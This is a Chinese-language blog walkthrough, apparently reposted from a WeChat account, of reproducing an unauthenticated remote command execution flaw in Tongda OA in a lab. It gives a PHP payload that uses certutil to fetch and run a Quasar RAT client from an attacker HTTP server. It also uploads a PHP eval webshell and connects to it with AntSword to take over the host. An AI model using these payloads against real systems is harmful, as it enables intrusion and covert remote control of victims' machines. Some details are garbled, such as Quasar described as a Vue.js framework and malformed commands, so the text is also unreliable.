通达OA,远程命令执行漏洞复现

admin 2024年8月2日13:04:06评论34 views字数 2085阅读6分57秒阅读模式

一、漏洞描述

通达OA是由北京通达信科科技有限公司开发的一款办公系统,前一段时间通达官方在其官网发布了安全提醒与更新程序,并披露有用户遭到攻击。攻击者可在未授权的情况下可上传图片木马文件,之后通过精心构造的请求进行文件包含,实现远程命令执行,且攻击者无须登陆认证即可完成攻击。

二、环境搭建

1、靶机通达OA下载,一键安装

下载地址:http://www.tongda2000.com/download/down.php?VERSION=2019&code=86d3V9EzrapwAKhPkxfbNZDsfB48gbFvbS0QYsUr%2FnNWNP2e5Fn%2F&F=baidu_natural&K=
访问该网站:
通达OA,远程命令执行漏洞复现

2、扫描漏洞

2.1 安全测试工具下载,这里使用的是Exp-tools工具

Exp-Tools是一个使用ExpDemo-JavaFX项目开发的安全测试工具,可以复现和分析多种OA系列的文件上传、命令执行、反序列化等漏洞。目前已实现了用友、泛微、通达、致远、帆软、万户、蓝凌、红帆、金和、华天动力等10个OA的漏洞,支持前台和后台。

Exp-tools下载地址:
https://github.com/cseroad/Exp-Tools
下载完成后需将此文件复制到jdk8的bin目录下,
通达OA,远程命令执行漏洞复现

该工具需使用JDK8启动
打开终端,cd 到jdk8的bin目录下
通达OA,远程命令执行漏洞复现

JDK8下载地址
https://www.oracle.com/java/technologies/javase/javase8-archive-downloads.html

2.2 填入网址,扫描漏洞

打开该软件,填入地址,验证查看扫描的信息,发现里面存在OA漏洞。
攻击者可以通过漏洞植入代码

通达OA,远程命令执行漏洞复现

三、创建木马

3.1 产看漏洞信息

通达OA,远程命令执行漏洞复现

我们选择上传一个RAT木马,

远程访问特洛伊木马(RAT,Remote Access Trojan)是一种恶意程序,能够让黑客监视和控制您的计算机、网络设备甚至整个网络。
与绝大多数恶意软件相同,RAT 通常会伪装成合法文件。黑客会将 RAT 附加到 E-mail 或大型软件包(如游戏)当中,广告和恶意网页中也可能会包含 RAT。与某些恶意软件和病毒不同,用户在下载到 RAT 时会很难分辨,它也不会主动拖慢计算机或其它网络设备的负载。所以在某些情况下,一些用户即便被 RAT 感染多年也没能发现。
如果要想避免 RAT,请不要从不信任的来源下载文件;不要打开陌生人的电子邮件附件;不要从非可靠来源下载游戏或软件,更不建议使用盗版;保持安全补丁更新也可以使您的浏览器和操作系统保持最新状态。

3.2 下载Quasar工具

下载地址:https://github.com/quasar/Quasar/releases

Quasar是一个强大且多功能的Vue.js框架,为开发者提供了构建跨平台应用程序的便利性和灵活性。其丰富的组件库、一体化的工具和跨平台支持使得开发者能够更轻松地构建现代化的Web、移动和桌面应用程序。
同时Quasar是一种公开可用的开源远程访问木马(RAT),主要针对Windows操作系统,它通过恶意附件在网络钓鱼电子邮件中分发,改项目最初是由GitHub用户MaxXor开发,用于合法用途,然而该工具此后被黑客用于各种网络间谍活动。
详细介绍:https://blog.csdn.net/qq_29901385/article/details/134596249

3.3 使用Quasar进行木马植入

创建木马流程:

3.3.1
通达OA,远程命令执行漏洞复现
3.3.2
通达OA,远程命令执行漏洞复现

3.3.3
通达OA,远程命令执行漏洞复现
3.3.4
通达OA,远程命令执行漏洞复现

3.3.5
通达OA,远程命令执行漏洞复现

这样我们就生成了远程访问木马,接下来将木马植入OA系统中
通达OA,远程命令执行漏洞复现

四、 上传RAT木马

4.1 首先将本地可执行程序,搭建为一个http服务器,端口为8000。

打开cmd,cd切换到可执行文件的目录,填入以下命令。
C:Users123456Desktop>client.exe -python -m http.server 8000

4.2 在Exp-tools中写入改代码,上传成功。

通达OA,远程命令执行漏洞复现

<?php
system.("certutil.exe -urlcache -split -f http://192.168.2.11:8000/client.exe");
?>

Windows有一个名为CertUtil的内置程序,可用于在Windows中管理证书。使用此程序可以在Windows中安装,备份,删除,管理和执行与证书和证书存储相关的各种功能。
CertUtil的一个特性是能够从远程URL下载证书或任何其他文件。
详细介绍请查看:https://www.cnblogs.com/nebulapioneer/p/18299419

4.3 打开quasar,开始监听端口

通达OA,远程命令执行漏洞复现

4.4 网页访问该地址时,木马程序运行

通达OA,远程命令执行漏洞复现

4.5 查看quasar,成功获取该主机

倘若不出现,多运行几遍以上cmd中命令

通达OA,远程命令执行漏洞复现

五、上传一句话木马,利用蚁剑连接

5.1 利用Exp-tools上传木马

<?php
@eval ($_POST['pass']);
?>

通达OA,远程命令执行漏洞复现

5.2 打开蚁剑,连接主机

通达OA,远程命令执行漏洞复现

成功得到主机信息!

通达OA,远程命令执行漏洞复现

原文始发于微信公众号(菜鸟小新):通达OA,远程命令执行漏洞复现

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年8月2日13:04:06
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   通达OA,远程命令执行漏洞复现http://cn-sec.com/archives/3026198.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息